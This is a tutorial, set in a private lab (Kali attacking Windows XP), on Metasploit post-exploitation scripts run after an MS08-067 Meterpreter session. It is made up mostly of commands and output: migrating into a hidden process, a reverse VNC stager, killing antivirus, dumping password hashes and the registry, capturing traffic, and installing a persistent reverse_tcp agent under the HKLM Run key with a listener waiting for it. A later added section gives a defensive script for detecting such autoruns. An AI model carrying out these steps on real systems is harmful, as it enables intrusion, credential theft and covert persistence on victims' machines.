Preface
This article walks through the functions and hands-on use of the post-exploitation scripts most commonly run once Metasploit has obtained a Meterpreter session.
| Test environment | Description | IP |
|---|---|---|
| Host (attacker) | Kali 2020 | 192.168.1.113 |
| Target | Windows XP SP3 | 192.168.1.106 |
First, the ms08_067 exploit module is run against the target; for the detailed steps see
"ms08_067 exploitation steps: obtaining Meterpreter access with MSF"
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:1216) at 2021-06-05 22:43:39 +0800
meterpreter >
1. Migrating the process
The goal of migrating is to make our control of the target stealthier and more durable: exploiting a vulnerability leaves a process on the target that is very easy to spot, so the session is moved into a less conspicuous process.
meterpreter > run post/windows/manage/migrate
[*] Running module against WINXP-1
[*] Current server process: svchost.exe (1156)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3716
[+] Successfully migrated into process 3716
2. Setting up a remote VNC session
This runs an interactive remote graphical tool on the compromised system (it lets you watch everything that happens on the other side's screen).
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.113 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\QuUcZHEDZcd.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.113:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "winxp-1"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
[Figure: screenshot of the target's desktop]
[Figure: the VNC service]
Possible problem
The target's desktop may be locked, so the desktop cannot be reached; the screen_unlock script can be used to unlock it.
meterpreter > run screen_unlock
3. Killing antivirus software
Antivirus software can block the attack process.
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
4. Dumping the system's password hashes
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a6cc07586ea276fb6bb10b5e6fbc07e5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
5. Viewing all traffic on the target
To see all network traffic on the target system, run the packet recorder script; every captured packet is saved in .pcap format and can be opened in Wireshark. The procedure is as follows:
meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WINXP-1_20210605.1818/WINXP-1_20210605.1818.cap
[*] Packet capture interval is 30 Seconds
6. Extracting system information
The scraper script extracts all system information: usernames and passwords, a download of the entire registry, password hashes, and so on.
meterpreter > run scraper
[*] New session on 192.168.1.106:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XoAUidOI.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\WINDOWS\TEMP\nHtPKIjq.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\WINDOWS\TEMP\FaWycKSv.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\WINDOWS\TEMP\qKYvqXeA.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\WINDOWS\TEMP\DnovcEeK.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.1.106:445...
7. Persistence
Meterpreter's persistence script injects a Meterpreter agent so that the system still connects back to Meterpreter after a reboot.
meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.113
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINXP-1_20210605.2824/WINXP-1_20210605.2824.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=443
[*] Persistent agent script is 99612 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\VAfovf.vbs
[*] Executing script C:\WINDOWS\TEMP\VAfovf.vbs
[+] Agent executed with PID 3384
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
meterpreter >
After the agent has been injected, use a handler to listen for it:
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:443
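As an added defensive example that is not part of the original post: the persistence output above drops a .vbs into C:\WINDOWS\TEMP and registers it under the HKLM Run key, which is exactly the kind of autorun an audit should catch. The script below parses a constructed .reg-style export of the Run key (the exact form of the value data is an assumption) and flags entries that launch from a temp directory or through a script file or script host.

```python
import re

# Constructed sample .reg export of the HKLM Run key. The value name and
# .vbs path mirror the post's persistence output; the exact command-line
# form of the value data is an assumption made for this example.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareUser.exe\""
"moOyPewJil"="C:\\WINDOWS\\TEMP\\VAfovf.vbs"
'''

RUN_KEY = re.compile(r"^\[(HK[^\]]*\\CurrentVersion\\Run(Once)?)\]$", re.I)
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')  # REG_SZ only
TEMP_DIR = re.compile(r"(\\|%)temp(\\|%)|\\tmp\\", re.I)
SCRIPT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b"
                    r"|\b(w|c)script(\.exe)?\b|\bmshta\b", re.I)

def unescape(s):
    """Undo .reg escaping of backslashes and double quotes."""
    return re.sub(r'\\(["\\])', r"\1", s)

def parse_run_keys(reg_text):
    """Return {key_path: {value_name: data}} for Run/RunOnce keys (REG_SZ values)."""
    keys, current = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):            # new key header
            m = RUN_KEY.match(line)
            current = m.group(1) if m else None
            if current:
                keys[current] = {}
            continue
        m = VALUE.match(line)
        if current and m:
            keys[current][unescape(m.group(1))] = unescape(m.group(2))
    return keys

def find_suspicious_autoruns(reg_text):
    """Flag Run-key entries that run from a temp directory or via a script host."""
    findings = []
    for key, values in parse_run_keys(reg_text).items():
        for name, data in values.items():
            reasons = []
            if TEMP_DIR.search(data):
                reasons.append("runs from a temp directory")
            if SCRIPT.search(data):
                reasons.append("script file or script host")
            if reasons:
                findings.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_suspicious_autoruns(SAMPLE_REG):
        print(f"[!] {f['key']}\\{f['name']} -> {f['data']} ({'; '.join(f['reasons'])})")
```

On a live host the same logic can be fed the output of `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg`; the cleanup .rc file Metasploit writes lists the same key for comparison.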
8. Viewing more scripts
Type run and then press TAB:
meterpreter > run
Display all 531 possibilities? (y or n)
run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
...
Post-exploitation scripts simplify the work of gathering further information once Meterpreter access has been obtained. Besides the scripts, a number of post-exploitation commands are also very useful; see "A complete guide to Metasploit post-exploitation commands" for details.
Summary
This article briefly introduced the functions and practical use of the post-exploitation scripts commonly run after Metasploit obtains Meterpreter access; it is intended for learning purposes only.